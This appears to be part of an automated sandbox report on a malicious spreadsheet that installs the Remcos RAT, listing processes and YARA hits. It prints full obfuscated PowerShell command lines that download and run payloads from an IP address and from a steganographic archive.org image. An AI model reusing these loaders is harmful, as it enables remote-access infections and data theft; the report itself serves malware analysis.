                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                                                    Imagebase:0x13f130000
                                                                                                                                                                                                                    File size:13'824 bytes
                                                                                                                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0x4ac30000
                                                                                                                                                                                                                    File size:345'088 bytes
                                                                                                                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0xffee0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                    Start time:09:24:05
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                                                                                                                                                                                                                    Imagebase:0x13ff60000
                                                                                                                                                                                                                    File size:2'758'280 bytes
                                                                                                                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                    Start time:09:24:05
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                    Start time:09:24:05
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                    Start time:09:24:06
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                                                                                                                                                                                                                    Imagebase:0x13fe80000
                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                                                                                                                                                                                                                    Imagebase:0xff910000
                                                                                                                                                                                                                    File size:168'960 bytes
                                                                                                                                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                    Start time:09:24:13
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                                    Call Graph

                                                                                                                                                                                                                    • Entrypoint
                                                                                                                                                                                                                    • Decryption Function
                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    • Show Help
                                                                                                                                                                                                                    callgraph 1 Error: Graph is empty

                                                                                                                                                                                                                    Module: Sheet1

                                                                                                                                                                                                                    Declaration
                                                                                                                                                                                                                    LineContent
                                                                                                                                                                                                                    1

                                                                                                                                                                                                                    Attribute VB_Name = "Sheet1"

                                                                                                                                                                                                                    2

                                                                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                                                    3

                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                                                    4

                                                                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                                                                    5

                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                                                                    6

                                                                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                                                                    7

                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                                                                    8

                                                                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                                                                    Module: Sheet2

                                                                                                                                                                                                                    Declaration
                                                                                                                                                                                                                    LineContent
                                                                                                                                                                                                                    1

                                                                                                                                                                                                                    Attribute VB_Name = "Sheet2"

                                                                                                                                                                                                                    2

                                                                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                                                    3

                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                                                    4

                                                                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                                                                    5

                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                                                                    6

                                                                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                                                                    7

                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                                                                    8

                                                                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                                                                    Module: Sheet3

                                                                                                                                                                                                                    Declaration
                                                                                                                                                                                                                    LineContent
                                                                                                                                                                                                                    1

                                                                                                                                                                                                                    Attribute VB_Name = "Sheet3"

                                                                                                                                                                                                                    2

                                                                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                                                    3

                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                                                    4

                                                                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                                                                    5

                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                                                                    6

                                                                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                                                                    7

                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                                                                    8

                                                                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                                                                    Module: ThisWorkbook

                                                                                                                                                                                                                    Declaration
                                                                                                                                                                                                                    LineContent
                                                                                                                                                                                                                    1

                                                                                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                                                                    2

                                                                                                                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                                                                    3

                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                                                    4

                                                                                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                                                                                    5

                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                                                                                    6

                                                                                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                                                                                    7

                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                                                                                    8

                                                                                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 02B30FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000003.436584026.0000000002B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_3_2b30000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
